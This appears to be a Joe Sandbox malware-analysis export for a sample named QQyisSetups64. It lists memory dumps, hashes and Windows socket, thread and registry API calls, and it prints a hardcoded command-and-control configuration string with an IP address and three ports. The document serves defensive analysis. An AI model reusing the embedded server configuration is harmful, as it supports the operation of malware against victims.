                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                                                                      • Opcode ID: a597f89e1a7f403be69b9fbe3a22e0cdaafca3ccb69d7923564691d6efe785e9
                                                                                                                                                                                                                      • Instruction ID: bcdccb47179383c860d7bd7cd9b8183eb215187c4ce642471eb7ced97e8a88fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a597f89e1a7f403be69b9fbe3a22e0cdaafca3ccb69d7923564691d6efe785e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0251A1727002419FD715EF69C8C0A6ABBA6BFC4718714D6A8D91A9B700D731F952CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03783043
                                                                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 03783064
                                                                                                                                                                                                                        • Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                                                                      • Opcode ID: feeddfa183d72fabe76faba62f93488ea55db1a60153439b7c4c60dc3b40b0e5
                                                                                                                                                                                                                      • Instruction ID: 0ad83e4670063844225735d0877dfe69c5d3d3005bb69571cc85db6ff1fe2eb4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: feeddfa183d72fabe76faba62f93488ea55db1a60153439b7c4c60dc3b40b0e5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821F67858030CDFEB20FF69DC88B9A77A5EF05710F1845A4E944AF180D7B4A981CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C83023
                                                                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 02C83044
                                                                                                                                                                                                                        • Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                                                                      • Opcode ID: 89fc3a975b84808c16da1c43e459d5a92201f9cea7d3004fd41f5dec28d90817
                                                                                                                                                                                                                      • Instruction ID: 5d6b46668a9c1e30722b8475fc69de3f89215f00e723d9a4e5308cf644660ed1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89fc3a975b84808c16da1c43e459d5a92201f9cea7d3004fd41f5dec28d90817
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21B470E00248DBDB20BF24DC88B9A7774EF45718F1081E5E5059B190DBB1AE84CFA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • send.WS2_32(?,?,00040000,00000000), ref: 03783291
                                                                                                                                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 037832CE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                                                                      • Opcode ID: 49e92954e88b453f6019b2c3b15e8b24a01a23eafe4cdaec45485168ba1646dd
                                                                                                                                                                                                                      • Instruction ID: 5e20043c30a2dfd5933c520bb6b44ad6a7b17326231b98c6d77d88002461904e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e92954e88b453f6019b2c3b15e8b24a01a23eafe4cdaec45485168ba1646dd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC11447EB41304BBE720EB2EDC88B4EBB9DFB81B60F144125FA0CD7281D270AC418254
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                                                                      • Opcode ID: e46fc5ed1fab301706a64b35810e5677630504e1ed250d94cf791aa316682091
                                                                                                                                                                                                                      • Instruction ID: e4b46ca97e2f1768f9be338cf576e7badbd31f5e4d64deb75cb1518d0f37fcc3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e46fc5ed1fab301706a64b35810e5677630504e1ed250d94cf791aa316682091
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB01D439A40A05AFE311EF28C8C8B69F7A6FB99B01F184264D1044B180D735A9C6C7D1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                                                                      • Opcode ID: 9a497feea9720a25021d87d318e2fe76d48933cc3e5f424bef6f3821f1a57d54
                                                                                                                                                                                                                      • Instruction ID: ee1726bfcd4e33c4b9a6a3de1dd128c034a9ca581b0d8e98fea8cb50d4cdae6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a497feea9720a25021d87d318e2fe76d48933cc3e5f424bef6f3821f1a57d54
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3701D431600245AFD711EF29D8C8B7DB3B5FB99749F149268D1008B2C0C771AAD5C7D5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,0378E04E,00000000,03789800,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 0378CD1B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378CD56
                                                                                                                                                                                                                        • Part of subcall function 03781280: __CxxThrowException@8.LIBCMT ref: 03781290
                                                                                                                                                                                                                        • Part of subcall function 03781280: DeleteCriticalSection.KERNEL32(00000000,0378D3E6,037A6624,?,?,0378D3E6,?,?,?,?,037A5A40,00000000), ref: 037812A1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                                                                      • Opcode ID: 07472876f7a2039a3f4e1223c3b521b6f199c793533ec5fbdd1b4492a08e0d00
                                                                                                                                                                                                                      • Instruction ID: 932ba9ae93b89161ee808d84b913d01d44d4e4f46da5f7ba421e4fd80f5bdc25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07472876f7a2039a3f4e1223c3b521b6f199c793533ec5fbdd1b4492a08e0d00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD017AB0A40B408FC331EF6A9844A47FAF8FF98700B504A1ED2DAC6A10D374A105CFA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C85AF2), ref: 02C8642B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C86466
                                                                                                                                                                                                                        • Part of subcall function 02C81280: __CxxThrowException@8.LIBCMT ref: 02C81290
                                                                                                                                                                                                                        • Part of subcall function 02C81280: DeleteCriticalSection.KERNEL32(00000000,?,02C97E78), ref: 02C812A1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                                                                      • Opcode ID: 11ebddc936180eb5427de1f4653426b8894c12a0ef9c17bdf9fc7ff2dd76c974
                                                                                                                                                                                                                      • Instruction ID: cab853451c70bc87e0060089673ddbc20e89e0c84f5b69b24d0aecdd206613eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ebddc936180eb5427de1f4653426b8894c12a0ef9c17bdf9fc7ff2dd76c974
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 040168B0A00B408BC3209F6A9844A07FAE8BF98714B108A1ED2DAC6A10D770A145CF95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0378DF10,00000000,00000000,00000000), ref: 0378E49B
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03791168,?,?,?,?,?,?,037A6298,0000000C,03791210,?), ref: 0378E4A9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1891408510-0
                                                                                                                                                                                                                      • Opcode ID: 2bb3a40809194b63299afeeff1fc51d59b562d50b6ed9319b0b471ba2de0cc59
                                                                                                                                                                                                                      • Instruction ID: 6ebf44bf9feed8baaf02e6362979a9c2da8d65607049d4fa138643b7f34fab56
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb3a40809194b63299afeeff1fc51d59b562d50b6ed9319b0b471ba2de0cc59
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E05BB0588209BFDF10FB54EC84F7633ECD7043317218615F928C2289E6399850C760
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0378F98F
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                        • Part of subcall function 0378F964: __getptd_noexit.LIBCMT ref: 0378F969
                                                                                                                                                                                                                        • Part of subcall function 0378F964: __freeptd.LIBCMT ref: 0378F973
                                                                                                                                                                                                                        • Part of subcall function 0378F964: ExitThread.KERNEL32 ref: 0378F97C
                                                                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 0378F9B0
                                                                                                                                                                                                                        • Part of subcall function 0379418F: __getptd_noexit.LIBCMT ref: 03794195
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 418257734-0
                                                                                                                                                                                                                      • Opcode ID: e7fe046e07d4d75dbf3f69dda03fb943e360090edce305159ac1ab589d0992a9
                                                                                                                                                                                                                      • Instruction ID: 0b77a19ad07d93688bca74c562712b681a6a44097991ba2f1a4ba48607c9cb6a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7fe046e07d4d75dbf3f69dda03fb943e360090edce305159ac1ab589d0992a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE0ECB9940700EFEF18FBA5E809E7D7775AF48601F20024AE1016F2A1CB799941DB21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C87181
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                        • Part of subcall function 02C87156: __getptd_noexit.LIBCMT ref: 02C8715B
                                                                                                                                                                                                                        • Part of subcall function 02C87156: __freeptd.LIBCMT ref: 02C87165
                                                                                                                                                                                                                        • Part of subcall function 02C87156: ExitThread.KERNEL32 ref: 02C8716E
                                                                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 02C871A2
                                                                                                                                                                                                                        • Part of subcall function 02C89C41: __getptd_noexit.LIBCMT ref: 02C89C47
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 418257734-0
                                                                                                                                                                                                                      • Opcode ID: c61b9da7888c13092d72a826444d718a347c39ff058e72cdf6096974a2198557
                                                                                                                                                                                                                      • Instruction ID: afb72937f9c9ce214a566e41d5ab619accdb81a82dd2b561c0b19e9e9fca84f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c61b9da7888c13092d72a826444d718a347c39ff058e72cdf6096974a2198557
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19E0ECB5A01604EFEB08BBA0C945E7E7776AF05705F208059E1026B3A1DA75A944EF24
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0379641B
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: __mtinitlocknum.LIBCMT ref: 03798E71
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: __amsg_exit.LIBCMT ref: 03798E7D
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03793F06,0000000D,037A6340,00000008,03793FFF,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?), ref: 03798E85
                                                                                                                                                                                                                      • __tzset_nolock.LIBCMT ref: 0379642C
                                                                                                                                                                                                                        • Part of subcall function 03795D22: __lock.LIBCMT ref: 03795D44
                                                                                                                                                                                                                        • Part of subcall function 03795D22: ____lc_codepage_func.LIBCMT ref: 03795D8B
                                                                                                                                                                                                                        • Part of subcall function 03795D22: __getenv_helper_nolock.LIBCMT ref: 03795DAD
                                                                                                                                                                                                                        • Part of subcall function 03795D22: _free.LIBCMT ref: 03795DE4
                                                                                                                                                                                                                        • Part of subcall function 03795D22: _strlen.LIBCMT ref: 03795DEB
                                                                                                                                                                                                                        • Part of subcall function 03795D22: __malloc_crt.LIBCMT ref: 03795DF2
                                                                                                                                                                                                                        • Part of subcall function 03795D22: _strlen.LIBCMT ref: 03795E08
                                                                                                                                                                                                                        • Part of subcall function 03795D22: _strcpy_s.LIBCMT ref: 03795E16
                                                                                                                                                                                                                        • Part of subcall function 03795D22: __invoke_watson.LIBCMT ref: 03795E2B
                                                                                                                                                                                                                        • Part of subcall function 03795D22: _free.LIBCMT ref: 03795E3A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1828324828-0
                                                                                                                                                                                                                      • Opcode ID: 0b394f981064968f9e126261eb497380b9283979ee21f3d14849ebd3645ef572
                                                                                                                                                                                                                      • Instruction ID: e8bb111b120f70e227ee65ef22454e64cd2491f9158af7cf79829ebac6ecf116
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b394f981064968f9e126261eb497380b9283979ee21f3d14849ebd3645ef572
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18E0C23C841710EAEE22FFF1B60AF4D72B06B89F31F50834BE040690D0DB740202C652
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C84755
                                                                                                                                                                                                                        • Part of subcall function 02C83260: __wcsrev.LIBCMT ref: 02CA0655
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C84750
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __wcsrevlstrlen
                                                                                                                                                                                                                      • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                                                                                                                      • API String ID: 4062721203-291094236
                                                                                                                                                                                                                      • Opcode ID: 26cddb4ed2cd679b75300efaa28b55bdbc1b9f97591ad6195d229d382f8a7a7a
                                                                                                                                                                                                                      • Instruction ID: 7cac3e93d4fa51d5ce9483c377fe93354d854235069c65375944047bb02b3812
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26cddb4ed2cd679b75300efaa28b55bdbc1b9f97591ad6195d229d382f8a7a7a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C08CB2288208DFFA0136D5900C72C3368EB22F69F509435E505C6402E652CD2097F2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(80000001,03786E9A), ref: 03786EC9
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(75A373E0), ref: 03786ED2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                      • Opcode ID: 5497cd9599029fe43a7f826c3cf11654b966b6b3b7a4ca59ace4a2b9433491d2
                                                                                                                                                                                                                      • Instruction ID: 682dd8c9aba7f1f1cf3588a33ca2373fcc6f2b7939bb2aa4b26ee35d9792d6ae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5497cd9599029fe43a7f826c3cf11654b966b6b3b7a4ca59ace4a2b9433491d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C04C72D0142857CA10E7A4ED4494A77B85B8C110F1184C2A604A3114C634AD418F90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: e6123c027a9a3db6dd746900d1cd5b9637e6d24baa007dcee09daba2c21f8a8c
                                                                                                                                                                                                                      • Instruction ID: b6cd287cc550659279e7b711860314435ad5b82c0abc232d6161f521a1af82ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6123c027a9a3db6dd746900d1cd5b9637e6d24baa007dcee09daba2c21f8a8c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE02274C08205EACF11CA41D18CBFD73B46B50708F20918DD002AB480D3742B04CAC4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                      • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
